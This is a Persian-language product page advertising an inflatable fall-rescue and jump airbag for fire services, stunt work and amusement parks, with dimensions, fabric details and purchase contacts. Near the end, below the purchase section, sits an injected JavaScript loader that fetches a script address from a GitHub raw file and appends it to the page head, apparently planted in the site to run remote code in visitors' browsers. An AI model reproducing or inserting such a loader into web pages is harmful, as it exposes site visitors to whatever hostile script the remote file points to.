تشک سقوط بادی
تشک سقوط بادی

تشک سقوط بادی

  • تشک سقوط بادی اکثر در شهر بازی ها بکار می رود. این تشک کاربرد های برای آتش نشان ها و سینما برای بدلکاران استفاده می شود

    تشک نجات بادی آتش نشانی ها

    تشک نجات LOSBERGER از دیگر تجهیزات آتش نشانی است که در ادامه به معرفی آن خواهیم پرداخت.

    تشک نجات از تجهیزاتی می‌باشد که در هنگام احتمال سقوط از آن استفاده می‌شود تا از صدمات ناشی از سقوط پیشگیری شود.

    افراد می‌توانند در هنگام بروز حوادثی چون آتش سوزی و … از ارتفاعات بالا پرش نموده و در مرکز ثقل این تشک فرود آیند. در این حالت بجز علائم طبیعی پرش از ارتفاع مانند حالت تهوع و سر درد عموما شخص آسیبی نمی‌بیند.

    تشک سقوط بادی در شهر بازی

    ایربگ سقوط آزاد چند منظوره ®BIGJUMPBAG ایربگ برگزیده برای افرادی است که به دنبال هیجان و آدرنالین هستند. مثل بانجی جامپینگ بدون طناب، پریدن از سکوها به داخل یک تشک بادی نرم بزرگ نهایت هیجان است. ما پرش‌های عادی حداکثر تا 10 متر را توصیه می‌کنیم، اما محصول را با بدلکاران تا ارتفاع 60 متر آزمایش کرده ایم. افراد بیشتر و بیشتری از گروه‌های سنی و سطح مهارت مختلف این جاذبه جدید را به عنوان بخشی از فستیوال‌ها، رویدادها یا باشگاه‌های دائمی در پارک‌های ماجراجویی در تمام دنیا تجربه می‌کنند.

    مشخصات تشک سقوط آزاد

    ابعاد و اندازه وزن این تشک 200 کیلوگرم، طول 9 متر و عرض 9 آن  متر می باشد. همچنین ارتفاع آن  2.5 متر است.جنس پارچه و دوخت

    پارچه این تشک بادی از با کیفیت ترین پارچه کره ای تهیه شده و دوام بسیار بالایی دارد. همچنین دوخت این تشک با نخ ترکیه ای توسط اساتید مجرب و با تجربه در این حوزه دوخته شده است.طرح و رنگ شکل این دستگاه قابل تغییر می باشد، اما رنگ و چاپ آن بستگی به شفارش شما و وجودی انبار  بستگی دارد. برای اطلاعات بیشتر به این محصول مراجعه کننید.

    نحوه خرید

    تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید این تشک سقوط بادی به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید